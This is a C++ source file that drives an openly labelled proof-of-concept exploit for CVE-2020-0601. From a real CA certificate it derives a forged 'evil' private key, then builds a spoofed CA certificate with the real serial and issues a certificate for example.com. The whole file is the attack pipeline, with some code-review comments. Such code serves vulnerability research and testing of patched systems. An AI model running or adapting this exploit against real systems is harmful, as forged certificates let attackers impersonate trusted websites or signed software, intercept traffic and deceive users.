main.cpp
#include <iostream>
#include <sstream>
#include <fstream>
#include "cve-2020-0601_poc.h"
#include "openssl-helper.h"
/// Runs the four helper stages of the CVE-2020-0601 proof of concept in order
/// and stops at the first stage that reports failure.
///
/// Stages, as called below:
///   1. craftEvilPrivKey          - derive a PKCS#8 private key from the CA public key bytes
///   2. pkcs8PrivKeyToPem         - re-encode that key as PEM
///   3. genSignedCaCertWithSerial - build a CA certificate with the supplied serial, signed with that key
///   4. genSignedCertForCN        - issue a key and certificate for `commonName` under that CA
///
/// @param commonName   Common name forwarded to genSignedCertForCN.
/// @param caPubKey     Public key bytes of the reference CA certificate.
/// @param caPubKeyLen  Length of `caPubKey` in bytes.
/// @param caSerial     Serial of the reference CA certificate, forwarded to genSignedCaCertWithSerial.
/// @param caSerialLen  Accepted but not forwarded to any helper in this function.
/// @return true only if all four stages returned true.
///
/// NOTE(review): every helper receives `true` plus one or two file names; presumably
/// that asks the helper to also write its output to those files in the current
/// working directory, private keys included. Confirm in openssl-helper.h.
/// NOTE(review): `caSerial` is handed on without its length; whether the helper
/// expects a NUL-terminated string cannot be seen from here.
bool genCve20200601Cert(const char *commonName,
                        const char *caPubKey, size_t caPubKeyLen,
                        const char *caSerial, size_t caSerialLen)
{
    // Stage 1: private key (PKCS#8) that yields the reference public key.
    char keyPkcs8[16384];
    size_t keyPkcs8Len;
    if (!craftEvilPrivKey(caPubKey, caPubKeyLen,
                          keyPkcs8, sizeof(keyPkcs8), &keyPkcs8Len,
                          true, "test-cve_evil-privkey-pk8.key")) {
        return false;
    }

    // Stage 2: same key, PEM encoded, as the later stages take PEM input.
    char keyPem[16384];
    size_t keyPemLen;
    if (!pkcs8PrivKeyToPem(keyPkcs8, keyPkcs8Len,
                           keyPem, sizeof(keyPem), &keyPemLen,
                           true, "test-cve_evil-privkey.key")) {
        return false;
    }

    // Stage 3: CA certificate reusing the reference serial, signed with the stage-2 key.
    unsigned char caCert[16384];
    size_t caCertLen;
    if (!genSignedCaCertWithSerial(caSerial,
                                   static_cast<const char *>(keyPem), keyPemLen,
                                   caCert, sizeof(caCert), &caCertLen,
                                   true, "test-cve_evil-ca.crt")) {
        return false;
    }

    // Stage 4: leaf key and certificate for commonName, issued by the stage-3 CA.
    unsigned char leafCert[8192];
    size_t leafCertLen;
    unsigned char leafKey[8192];
    size_t leafKeyLen;
    const bool issued = genSignedCertForCN(commonName,
                                           reinterpret_cast<const char *>(caCert), caCertLen,
                                           static_cast<const char *>(keyPem), keyPemLen,
                                           leafKey, sizeof(leafKey), &leafKeyLen,
                                           leafCert, sizeof(leafCert), &leafCertLen,
                                           true, "test-cve_host-cert.crt", "test-cve_host-privkey.key");
    return issued;
}
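/// Entry point: reads a PEM CA certificate from the path given in argv[1],
/// extracts its public key bytes and serial number, and passes both to
/// genCve20200601Cert with the fixed common name "example.com".
///
/// @return 0 when every step succeeded, -1 otherwise (missing argument,
///         unreadable or empty input file, or any helper reporting failure).
///
/// The previous version returned the bool from genCve20200601Cert directly, so
/// success exited with status 1 and a failed final step exited with status 0;
/// it also dereferenced argv[1] without checking argc.
int main(int argc, char **argv)
{
    // argv[1] is a null pointer when no argument is given; constructing an
    // ifstream from it is undefined behaviour.
    if (argc < 2 || argv[1] == nullptr) {
        std::cerr << "usage: " << ((argc > 0 && argv[0] != nullptr) ? argv[0] : "poc")
                  << " <ca-cert.pem>\n";
        return -1;
    }

    std::ifstream caCertF(argv[1]);
    if (!caCertF) {
        std::cerr << "cannot open " << argv[1] << '\n';
        return -1;
    }

    std::ostringstream buf;
    buf << caCertF.rdbuf();
    const std::string caCertPem = buf.str();
    if (caCertPem.empty()) {
        std::cerr << "no certificate data in " << argv[1] << '\n';
        return -1;
    }

    // Raw public key bytes of the CA certificate; the later stage derives a
    // private key that reproduces them.
    // NOTE(review): getCertPublicKey is given no buffer capacity here, so whether
    // its write is bounded to sizeof(caPubKey) cannot be seen from this file;
    // confirm in openssl-helper.h before feeding it certificates from an
    // untrusted source.
    unsigned char caPubKey[8192];
    size_t caPubKeyLen = 0;
    if (!getCertPublicKey(caCertPem.c_str(), caCertPem.size(), caPubKey, &caPubKeyLen)) {
        return -1;
    }

    // Serial number of the CA certificate.
    unsigned char caSerial[512];
    size_t caSerialLen = 0;
    if (!getCertSerial(caCertPem.c_str(), caCertPem.size(), caSerial, sizeof(caSerial), &caSerialLen)) {
        return -1;
    }

    const bool ok = genCve20200601Cert("example.com",
                                       reinterpret_cast<const char *>(caPubKey), caPubKeyLen,
                                       reinterpret_cast<const char *>(caSerial), caSerialLen);
    // Map the bool onto a conventional exit status.
    return ok ? 0 : -1;
}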